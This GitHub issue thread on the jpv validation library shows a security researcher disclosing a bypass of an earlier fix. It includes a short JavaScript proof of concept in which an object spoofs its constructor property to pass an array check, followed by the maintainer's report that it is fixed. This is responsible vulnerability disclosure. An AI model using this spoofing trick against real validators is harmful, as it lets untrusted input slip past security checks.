Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Validation Bypass #10

Closed
Garrestocles opened this issue Aug 6, 2020 · 3 comments
Closed

Validation Bypass #10

Garrestocles opened this issue Aug 6, 2020 · 3 comments

Comments

@Garrestocles
Copy link

Hello,

I'm a security researcher at Sonatype, and I discovered a potential vulnerability in this project. Do you have a preferred way for me to share the details privately, or do you want me to just show you what I've got on this GitHub issue?

@manvel-khnkoyan
Copy link
Owner

Please, could you share it here ?
Thanks

@Garrestocles
Copy link
Author

I was looking at issue #6, and it seems like we can still bypass the provided fix. In the line where it's checking if the constructors match, it's still possible to just set the constructor of the data we're trying to get validated to mock whatever it's supposed to be.

Here's a Proof of Concept:

const jpv = require('jpv');

const someJson = {
    definitelyAnArray: {
      sneakyStuff: "Don't tell anyone, but I'm not actually an array.", 
      constructor: [].constructor
    }
};
const schema = {
  definitelyAnArray: []
};

// jpv.validate(someJson, schema) should return false, but, as of 2.2.1, returns true
console.log("Validation is getting bypassed: " + jpv.validate(someJson, schema)); 

manvel-khnkoyan pushed a commit that referenced this issue Aug 8, 2020
@manvel-khnkoyan
Copy link
Owner

The issue was fixed #10

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants